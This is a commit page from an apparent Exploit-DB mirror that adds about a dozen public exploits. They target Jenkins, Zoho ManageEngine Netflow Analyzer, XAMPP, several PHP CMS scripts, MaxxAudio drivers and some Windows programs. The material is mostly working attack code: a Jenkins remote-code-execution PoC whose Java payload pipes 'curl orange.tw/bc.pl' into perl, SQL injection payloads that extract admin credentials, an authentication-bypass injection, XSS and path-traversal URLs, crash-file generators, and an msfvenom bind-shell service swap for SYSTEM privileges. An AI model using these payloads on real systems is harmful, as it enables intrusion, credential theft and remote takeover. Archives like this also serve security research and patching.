bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-20

Browse source 
13 changes to exploits/shellcodes

NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)
Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation
Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting
eDirectory - SQL Injection
XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting
Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting
Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
Jenkins - Remote Code Execution
This commit is contained in:
Offensive Security 2019-02-20 05:01:54 +00:00
parent cd868436ff
commit 79a4beaea4
14 changed files with 687 additions and 10 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

70
exploits/java/webapps/46427.txt Normal file
View file

@ -0,0 +1,70 @@
In the exploitation, the target is always escalating the read primitive or write primitive to code execution! From the previous section, we can write malicious JAR file into remote Jenkins server by Grape. However, the next problem is how to execute code?
By diving into Grape implementation on Groovy, we realized the library fetching is done by the class groovy.grape.GrapeIvy! We started to find is there any way we can leverage, and we noticed an interesting method processOtherServices(…)!
void processOtherServices(ClassLoader loader, File f) {
try {
ZipFile zf = new ZipFile(f)
ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
if (serializedCategoryMethods != null) {
processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods))
}
ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
if (pluginRunners != null) {
processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
}
} catch(ZipException ignore) {
// ignore files we can't process, e.g. non-jar/zip artifacts
// TODO log a warning
}
}
JAR file is just a subset of ZIP format. In the processOtherServices(…), Grape registers servies if there are some specified entry points. Among them, the Runner interests me. By looking into the implementation of processRunners(…), we found this:
void processRunners(InputStream is, String name, ClassLoader loader) {
is.text.readLines().each {
GroovySystem.RUNNER_REGISTRY[name] = loader.loadClass(it.trim()).newInstance()
}
}
Here we see the newInstance(). Does it mean that we can call Constructor on any class? Yes, so, we can just create a malicious JAR file, and put the class name into the file META-INF/services/org.codehaus.groovy.plugins.Runners and we can invoke the Constructor and execute arbitrary code!
Here is the full exploit:
public class Poc {
public Poc(){
try {
String payload = "curl orange.tw/bc.pl | perl -";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}
}
$ javac Orange.java
$ mkdir -p META-INF/services/
$ echo Orange > META-INF/services/org.codehaus.groovy.plugins.Runners
$ find .
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[your_host]/tw/orange/poc/1/poc-1.jar
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2019 11:10:55 GMT
...
PoC:
http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;

154
exploits/jsp/webapps/46425.html Normal file
View file

@ -0,0 +1,154 @@
<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
2. Proof of Concept
Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini
3. Solution:
The product is discontinued. Update to last version this product.
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.
2. Proof of Concept
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true
Parameters: bussAlert, customDev and selSource
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.
2. Proof of Concept
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=
Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.
2. Proof of Concept
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest
Parameters: authMeth, passWord, pwd1 and userName
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
2. Proof of Concept
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad
Parameters: param and rtype
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

59
exploits/php/webapps/46418.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
# Google Dork: inurl:"assets/external/data.php"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597
# Demo Website: https://themerig.com/find/
# Version: 1.5
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/assets/external/data_2.php
2. You can perform a "Generic UNION query" and extract admin credentials by sending a "POST" request using the payload below
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Request:
----------------------
POST /find/assets/external/data_2.php HTTP/1.1
Host: server
Connection: close
Content-Length: 251
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://themerig.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://server/find/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 227
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 03:09:26 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
{"data":[{"id":null,"category":null,"title":null,"address":null,"latitude":null,"longitude":null,"marker_color":null,"feaured":null,"marker_image":[""],"featured":"admin::4db50f86732e926e59d306cff063d568::themerig@server"}]}

66
exploits/php/webapps/46419.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
# Google Dork: inurl:"pages.php?title=privacy-policy"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294
# Demo Website: https://listing-hub.themerig.com
# Version: 1.0
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/pages.php?title=privacy-policy&id=2
2. You can perform an " error-based" SQL Injection using the payload below
2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-
# Request:
----------------------
GET /pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1
Accept-Encoding: gzip, deflate
Host: server
Accept: */*
Connection: close
Cache-Control: no-cache
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=icrk7uvmqmpsmb4ndt56me8564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 1149
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 06:16:21 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="eng">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index,follow"><br />
<b>Notice</b>: Undefined index: title in <b>/home2/otomati5/server/includes/head.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>: PDO::query(): SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '::otomati5_hub@localhost::otomati5_hub::10.1.37-MariaDB-cll-lve:' for key 'group_key' in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
<br />
<b>Fatal error</b>: Call to a member function fetch() on boolean in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />

54
exploits/php/webapps/46420.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Google Dork: N/A
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://zuz.host/
# Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476
# Version: 2.1
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability.
# POC:
----------------------
1. Go To https://[PATH]/contact
2. There are three vulnerable parameters name, subject and message.
3. Inject the JavaScript code.
4. The Injected JavaScript code will be executed when the Administrator open the malicious message https://demos.zuz.host/gmusic/admin/inbox.
# Request:
----------------------
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection: close
Content-Length: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0
{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}
# Response:
----------------------
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type: application/json
Content-Length: 183
{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}

29
exploits/php/webapps/46423.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Admin auth bypass, SQLi and File Disclosure
# Google Dork: no defacers please !
# Date: March 2019 (reported to vendor without response :D)
# Exploit Author: Efren Diaz
# Author contact: https://twitter.com/elefr3n
# Vendor Homepage: https://www.edirectory.com/
# Software Link: not available
# Version: All versions
# Tested on: Ubuntu 14.04
# CVE : none
#DESCRIPTION
eDirectory is a software to create your own membership website, business directories, yellow pages, coupon sites, local guide, lead gen sites and more.
# SQL Injection
Links:
- https://site.com/location.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]
# Administrator Login Bypass
The login SQL injection can be useful for us to make a union SQL injection to avoid the administrator authentication and get access to the dashboard correctly. Sometimes you get a "Invalid key error", but the web application set to you correctly the cookie, if you got that error press F5 and you will be authenticated as an administrator
Link: https://site.com/sitemgr/login.php?key=' union select 0,1,0,'sitemgr' -- -
# File Disclosure (authenticated)
Note: only files with .php extension, but don't forget try null-byte in old php versions
Links:
- https://site.com/sitemgr/langcenter/language_file.php?language_area=front&domain_id=1&language_id=[PATH]
- https://site.com/sitemgr/configuration/geography/language/language_file.php?language_area=front&domain_id=1&language_id=[PATH]

76
exploits/php/webapps/46424.html Normal file
View file

@ -0,0 +1,76 @@
<!--
# Exploit Title: SQL injection in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8923
# Category: webapps
1. Description
XAMPP through 5.6.8 allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29
3. Solution:
The product is discontinued. Update to last version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->
<!--
# Exploit Title: Cross Site Scripting in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8924
# Category: webapps
1. Description
XAMPP through 5.6.8 allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
First Request (not filter the characters's content): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
or Request: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
Second Request (to xss attack): http://X.X.X.X/xampp/cds-fpdf.php
http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
When cds-fpdf.php is loaded not filter the characters: <b><script>alert("XSS")</script></b></td><td class=tabval>
cds.php filter it: <td class=tabval><b><script>alert("XSS&quot</script></b></td><td class=tabval>
3. Solution:
The product is discontinued. Update to last version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->

20
exploits/php/webapps/46426.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1
# PoC:
# Cross Site Scripting:
# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>
# SQL Injection:
# http://localhost/[PATH]/list-details.php?view=[SQL]

21
exploits/windows/dos/46417.py Executable file
View file

@ -0,0 +1,21 @@
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-17
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: NetSetMan_4.7.1.py
#2.- Open netsetman.txt and copy content to clipboard
#3.- Open NetSetMan
#4.- Enable "Workgroup" and Paste Clipboard
#5.- Click on "Activate"
#6.- Crashed
cod = "\x41" * 100
f = open('netsetman.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/46421.py Executable file
View file

@ -0,0 +1,22 @@
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed
cod = "\x41" * 256
f = open('valentina.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/46422.py Executable file
View file

@ -0,0 +1,22 @@
#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py
#2.- Open bullet.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "SMTP"
#5.- In "Email Server" select "SMTP Server" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed
cod = "\x41" * 257
f = open('bullet.txt', 'w')
f.write(cod)
f.close()

20
exploits/windows/local/40848.java
View file

@ -1,11 +1,12 @@
# Exploit Title: WinPower V4.9.0.4 Privilege Escalation
# Date: 29-11-2016
# Software Link: http://www.ups-software-download.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: local
// Exploit Title: WinPower V4.9.0.4 Privilege Escalation
// Date: 29-11-2016
// Software Link: http://www.ups-software-download.com/
// Exploit Author: Kacper Szurek
// Contact: http://twitter.com/KacperSzurek
// Website: http://security.szurek.pl/
// Category: local
/*
1. Description
UPSmonitor runs as SYSTEM process.
@ -25,6 +26,7 @@ So using this we can create new administrator account.
http://security.szurek.pl/winpower-v4904-privilege-escalation.html
2. Proof of Concept
*/
/*
WinPower V4.9.0.4 Privilege Escalation
@ -152,6 +154,4 @@ public class WinPowerExploit {
}
}
Compiled Exploit:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40848.class
// Compiled Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40848.class

72
exploits/windows/local/46416.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation
# Google Dork:
# Date: 2/18/2019
# Exploit Author: Mike Siegel @ml_siegel
# Vendor Homepage: https://maxx.com
# Software Link:
# Version: 1.6.2.0 (May affect other versions)
# Tested on: Win 10 64 bit
# CVE : None
MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.
MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges.
Dell PSIRT has acknowledged the issue and advises updating to a supported driver.
Proof of concept:
1. Validate incorrect permissions.
C:\Users\user> sc qc wavessyssvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wavessyssvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
ACME\user:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\user>
2. Create payload
Create a service payload in msfvenom, transfer to victim:
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe
3. Overwrite file.
The file will be in use, you cannot directly overwrite. However you can move the file and replace.
C:\Users\user> move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"
C:\Users\user> copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
4. Reboot the system. Then use netcat or telnet to connect back to 127.0.0.1:4444
C:\WINDOWS\SYSTEM32>whoami
whoami
nt authority\system
Additional information:
This file is embedded in Realtek audio drivers. Dell has since removed this version from their site but it appears to have been released in January 2017.
hash is as follows: cbd0c592c59db94d27ad89db2db7432c0c40db69198d9174eb1bb4bd04e12213 *WavesSysSvc64.exe

12
files_exploits.csv
View file

@ -6322,6 +6322,9 @@ id,file,description,date,author,type,platform,port
46410,exploits/java/dos/46410.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions",2019-02-18,"Google Security Research",dos,java,
46411,exploits/java/dos/46411.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass",2019-02-18,"Google Security Research",dos,java,
46412,exploits/java/dos/46412.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process",2019-02-18,"Google Security Research",dos,java,
46417,exploits/windows/dos/46417.py,"NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
46421,exploits/windows/dos/46421.py,"Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
46422,exploits/windows/dos/46422.py,"BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
